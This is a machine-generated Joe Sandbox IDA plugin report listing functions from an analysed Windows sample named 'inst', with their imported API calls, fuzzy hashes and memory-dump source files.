Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
Instruction ID: c9f1f5b124f69f09cdbae73760d168ad58ebda9b4a4e84dcb44cd434a4b80eab
Opcode Fuzzy Hash: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
Instruction Fuzzy Hash: C7313771500609AFCF21DF69C880E9ABBF5FF58720B14891DF866A72A0D730E951DFA0

Function 00AB3F03 Relevance: 4.6, APIs: 3, Instructions: 91COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000FC), ref: 00AB3F74
GetWindowLongW.USER32(?,000000FC), ref: 00AB3F9B
SetWindowLongW.USER32(?,000000FC,?), ref: 00AB3FAA

Part of subcall function 00AB3EE0: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB3EF2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
Instruction ID: 1ea06a78bb4e8c45a688bb1bfef79ac66e32680b3bdd18294772a99e397d7a01
Opcode Fuzzy Hash: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
Instruction Fuzzy Hash: AE317E72600605AFCF20DF69CC84DAABBF9FF48310B108519F85A9B2A1D731EA51DF90

Function 00AC18C5 Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC18CC
GetClientRect.USER32(?,?), ref: 00AC1912
OffsetRect.USER32(?,?,00000000), ref: 00AC1957

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Rect$ClientH_prolog3Offset
String ID:
API String ID: 236044050-0
Opcode ID: 07b06d92d468cb167f77186f9378c380bd205e2a4cfa40b3e71e261cb64a3cd6
Instruction ID: 407ab49157743c97e5f3c6e5fb5e1476dcea9b1c212a9c2c39e670dab934339a
Opcode Fuzzy Hash: 07b06d92d468cb167f77186f9378c380bd205e2a4cfa40b3e71e261cb64a3cd6
Instruction Fuzzy Hash: 0021C276A0021AEFCB01DFE8D9859EEBBBAFF49310F10401AF515A7211D771AA51CFA1

Function 00AD87F5 Relevance: 4.6, APIs: 3, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD8838
__wsplitpath.LIBCMT ref: 00AD8845

Part of subcall function 00AFEDC6: __wsplitpath_helper.LIBCMT ref: 00AFEE08

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AD8874

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
String ID:
API String ID: 1401654830-0
Opcode ID: 5e220a4a4a3e365103fca6f04212f1631e256a1439f91968605e1979b73c017a
Instruction ID: c4df6f264b7157b16924c9e48adf688c46f3b43ce216f1d890fbadbe8a6da15b
Opcode Fuzzy Hash: 5e220a4a4a3e365103fca6f04212f1631e256a1439f91968605e1979b73c017a
Instruction Fuzzy Hash: C221CC7291030C9FDB61DFE8DC859EEB7BDAF09344F10452AA519EB211EB30A909CB51

Function 00ABECF0 Relevance: 4.6, APIs: 3, Instructions: 68windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ABECF7

Part of subcall function 00ABB33C: KillTimer.USER32(?,00002710), ref: 00ABB344

Part of subcall function 00ABEC81: GetModuleHandleW.KERNEL32(?), ref: 00ABEC97
Part of subcall function 00ABEC81: FindResourceW.KERNEL32(?,?,?), ref: 00ABECA8
Part of subcall function 00ABEC81: SizeofResource.KERNEL32(?,00000000), ref: 00ABECB7
Part of subcall function 00ABEC81: LoadResource.KERNEL32(?,00000000), ref: 00ABECC1
Part of subcall function 00ABEC81: LockResource.KERNEL32(00000000), ref: 00ABECC8

GetParent.USER32(000000FF), ref: 00ABEDA8
SendMessageW.USER32(00000000,00000BD0,00000000,00000000), ref: 00ABEDB8

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Resource$FindH_prolog3HandleKillLoadLockMessageModuleParentSendSizeofTimer
String ID:
API String ID: 3209458795-0
Opcode ID: 2ec346e1550482d0b303c31b45c60a7e017707087b7e9d04ad37928bdc42d3d2
Instruction ID: 77ea02e9efac705c96277e162ba2b494146d2fcbffb470d7da04e1aa91b06341
Opcode Fuzzy Hash: 2ec346e1550482d0b303c31b45c60a7e017707087b7e9d04ad37928bdc42d3d2
Instruction Fuzzy Hash: F921A1717107099BDF10EF748D16BEE77EAAF44300F000419B926EB292DBB4DA119B41

Function 00AA5B5D Relevance: 4.6, APIs: 3, Instructions: 60COMMON

Download Yara Rule

APIs

GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00AA5B74
_malloc.LIBCMT ref: 00AA5B81

Part of subcall function 00AF5674: __FF_MSGBANNER.LIBCMT ref: 00AF5697
Part of subcall function 00AF5674: __NMSG_WRITE.LIBCMT ref: 00AF569E
Part of subcall function 00AF5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA), ref: 00AF56EB

GetIpAddrTable.IPHLPAPI(00000000,?,00000000,00000000,?,00000000), ref: 00AA5B97

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AddrTable$AllocateHeap_malloc
String ID:
API String ID: 3107517213-0
Opcode ID: b84d7aabba434da8548ce5c629f9729aa0f465e2a5f3cfdcf657c701a86e8fc1
Instruction ID: e46184e19923269d49fde4b321a18fe0b4f3f03f91398a72455612feef5bad9b
Opcode Fuzzy Hash: b84d7aabba434da8548ce5c629f9729aa0f465e2a5f3cfdcf657c701a86e8fc1
Instruction Fuzzy Hash: FB01C472D00518AFDB229FB9DCC19FEB3ACAB06752B2004AAF54193080F7749E809778

Function 00A9F326 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A9F32D
PathFileExistsW.SHLWAPI(?,00000000,00B3E544,0000005C,00000008), ref: 00A9F37D
SHCreateDirectory.SHELL32(00000000,?), ref: 00A9F389

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateDirectoryExistsFileH_prolog3Path
String ID:
API String ID: 2789380810-0
Opcode ID: d93736486dfa4149ba310ca4e3defcaf88d8b56183b2efdf60c5070a1f7873b0
Instruction ID: 47d2bf26dfa64cf92e55baf36df7f71b608ef339f345bc9f3680aacee200db2f
Opcode Fuzzy Hash: d93736486dfa4149ba310ca4e3defcaf88d8b56183b2efdf60c5070a1f7873b0
Instruction Fuzzy Hash: F6115131A015099FCF14EFA4C995AFE77A4AF10350F048429F525AB282DB34DA46CB61

Function 00AE6C45 Relevance: 4.6, APIs: 3, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,?,00000080,00000000,?,00AA8D5A,00000000,?,00AE68E0,?,00000000,00000000,00000748), ref: 00AE6C90
_wcsncpy.LIBCMT ref: 00AE6CB1

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateFile_wcsncpy
String ID:
API String ID: 4108816585-0
Opcode ID: 9b0629cafb1561917a488a738bd3f921bb03018e32ff2991946b93560dd220ec
Instruction ID: 770ef538ca837b70751273de3dd4f5fc484829271edaa7b8874bfdab9d3d184b
Opcode Fuzzy Hash: 9b0629cafb1561917a488a738bd3f921bb03018e32ff2991946b93560dd220ec
Instruction Fuzzy Hash: 25014C316402547AD7306F738D45FAF377CEBE4BD5F208C26FA4597140D57085408260

Function 00A8CE6B Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00A8CE75

Part of subcall function 00A8CBDE: _wcslen.LIBCMT ref: 00A8CBEF

_memset.LIBCMT ref: 00A8CEE2
GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00A8CEF9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3_LongNamePath_memset_wcslen
String ID:
API String ID: 3807393607-0
Opcode ID: 45f1c5146a1877608bacc3199e7ee86791282ea8e42987168b3be747e2453c98
Instruction ID: 8d8120b7caa39e8bc94d4070c8676efff11f6732bdcb326512de809ac6f1e7fe
Opcode Fuzzy Hash: 45f1c5146a1877608bacc3199e7ee86791282ea8e42987168b3be747e2453c98
Instruction Fuzzy Hash: 64019271A9061C6BDB10FB54CD4EBEE72B9AF14712F004089F1089B292DBB45F458FE5

Function 00AC2FDE Relevance: 4.5, APIs: 3, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AC2FE5

Part of subcall function 00AAD649: BeginPaint.USER32(?,?), ref: 00AAD65B

SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC3038
EndPaint.USER32(?,?), ref: 00AC3045

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Paint$BeginH_prolog3_Window
String ID:
API String ID: 4095823405-0
Opcode ID: d94abdb448e4e1e75c1ae64aa7aad9a36dd3997f96cfc5fd8c2a2d7bca6692b4
Instruction ID: 9b45a099b4c1a0c578ea1d02070f77c9e3a20d50cdc5802db52bfa7578c66e02
Opcode Fuzzy Hash: d94abdb448e4e1e75c1ae64aa7aad9a36dd3997f96cfc5fd8c2a2d7bca6692b4
Instruction Fuzzy Hash: EC0108B290060DAFDF219FD1CD85DEEBBBAFF04308B404429B616AA560D671AD158B10

Function 00A72770 Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00A72744,?), ref: 00A72784
CloseHandle.KERNEL32(00000000), ref: 00A727CD
CloseHandle.KERNEL32(00000000), ref: 00A727D7

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseHandle$CreateFile
String ID:
API String ID: 1378612225-0
Opcode ID: 2700766cf5d0b215db0b3e6b7bed8a6d45a4313aaef3f3657cc6047ddd48863d
Instruction ID: 3b2c1329d61769605af2f2bd696717d0230669ce57b7f65c910f75da7fa71892
Opcode Fuzzy Hash: 2700766cf5d0b215db0b3e6b7bed8a6d45a4313aaef3f3657cc6047ddd48863d
Instruction Fuzzy Hash: FDF02E3278031077E73063747E4AFC62A859B94B31F25C524FA19BB2C4F9B19C424399

Function 00AE0319 Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00AE059E,?,00B5CDA4,?,00AE059E,?), ref: 00AE0323
CreateFileW.KERNEL32(00AE059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,00AE059E,?), ref: 00AE033E
CloseHandle.KERNEL32(00000000), ref: 00AE0367

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$CloseCreateDeleteHandle
String ID:
API String ID: 3273607511-0
Opcode ID: 45d5d60904320155d5e5a510c7fb1ec5ac11829b2dc9cf88a4d5006a8bf40cc9
Instruction ID: bc761502461a99a3b32adc0ae8468da93265e7c7394816e16364853dd92a00f1
Opcode Fuzzy Hash: 45d5d60904320155d5e5a510c7fb1ec5ac11829b2dc9cf88a4d5006a8bf40cc9
Instruction Fuzzy Hash: 28F0E232200204BBEB315B62DC05FEA3E69DB44B72F008424FA259B0D0DAB2E09197A8

Function 6C68DF34 Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C68DF4E

Part of subcall function 6C68D47E: __FF_MSGBANNER.LIBCMT ref: 6C68D4A1
Part of subcall function 6C68D47E: __NMSG_WRITE.LIBCMT ref: 6C68D4A8
Part of subcall function 6C68D47E: RtlAllocateHeap.NTDLL(00000000,6C68DF44,?,?,?,?,6C68DF53,?), ref: 6C68D4F5

std::bad_alloc::bad_alloc.LIBCMT ref: 6C68DF71

Part of subcall function 6C68DF19: std::exception::exception.LIBCMT ref: 6C68DF25

__CxxThrowException@8.LIBCMT ref: 6C68DF93

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID:
API String ID: 3715980512-0
Opcode ID: dc0c0feab3d43feb3a8902122439d0436b382fdf70788cee2840a3e7126f9581
Instruction ID: af386e0d315dc1682175b661498fcd0da183d726d38e96f839040261ddc9e443
Opcode Fuzzy Hash: dc0c0feab3d43feb3a8902122439d0436b382fdf70788cee2840a3e7126f9581
Instruction Fuzzy Hash: E0F0277070A10B62CF045671D8009DD3B789F4231CF10812BE91097DE0DF61DA0C96BE

Function 00AF5546 Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00AF5560

Part of subcall function 00AF5674: __FF_MSGBANNER.LIBCMT ref: 00AF5697
Part of subcall function 00AF5674: __NMSG_WRITE.LIBCMT ref: 00AF569E
Part of subcall function 00AF5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA), ref: 00AF56EB

std::bad_alloc::bad_alloc.LIBCMT ref: 00AF5583

Part of subcall function 00AF552B: std::exception::exception.LIBCMT ref: 00AF5537

__CxxThrowException@8.LIBCMT ref: 00AF55A5

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID:
API String ID: 3715980512-0
Opcode ID: 460feee1c8ed4d11225c7b0b31041980b9352cd7d77dca4e82e7da2712711346
Instruction ID: c41f336ac7552dcf3b8d1c2e475ec5350ac947c63ea9167572182f3dc966f10f
Opcode Fuzzy Hash: 460feee1c8ed4d11225c7b0b31041980b9352cd7d77dca4e82e7da2712711346
Instruction Fuzzy Hash: 6DF02731C00A0C22CB1477F4ED06EBD3BE98F05314F4440A4FB059A0A2DF21DB44C691

Function 00AC1513 Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00AC152B
PostMessageW.USER32(?,000008C7,?,?), ref: 00AC154E
InvalidateRect.USER32(?,00000000,00000001), ref: 00AC155A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: InvalidateMessagePostRectWindow
String ID:
API String ID: 2061673745-0
Opcode ID: a6b3707076a7611dedbd5131c3f52c22408c1fbb7479b47734e66d9860b4dd5b
Instruction ID: cfa34625eb81f83a81d367fe8d4c8039e681af88caaaf370ab878c5da7aae210
Opcode Fuzzy Hash: a6b3707076a7611dedbd5131c3f52c22408c1fbb7479b47734e66d9860b4dd5b
Instruction Fuzzy Hash: E1F05E71610A10AAEB324B6ADC08FA7BBF9FF94700F00041EF1A6C2160CAB19402EB60

Function 00A91E26 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A91E36
_wcslen.LIBCMT ref: 00A91E4A
_wcscpy.LIBCMT ref: 00A91E5B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _wcslen$_wcscpy
String ID:
API String ID: 3469035223-0
Opcode ID: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
Instruction ID: 7ff593634904b9e469126ce73a44c67d51d27f6e715416d2f7d0431ce68634d9
Opcode Fuzzy Hash: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
Instruction Fuzzy Hash: 67E0D8323042105FD6282549A802B3FB3E9CBD6B33F20081FF640D31C1DA745C414158

Function 00A8BFF4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A8BFFB

Strings

CAB, xrefs: 00A8C00E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID: CAB
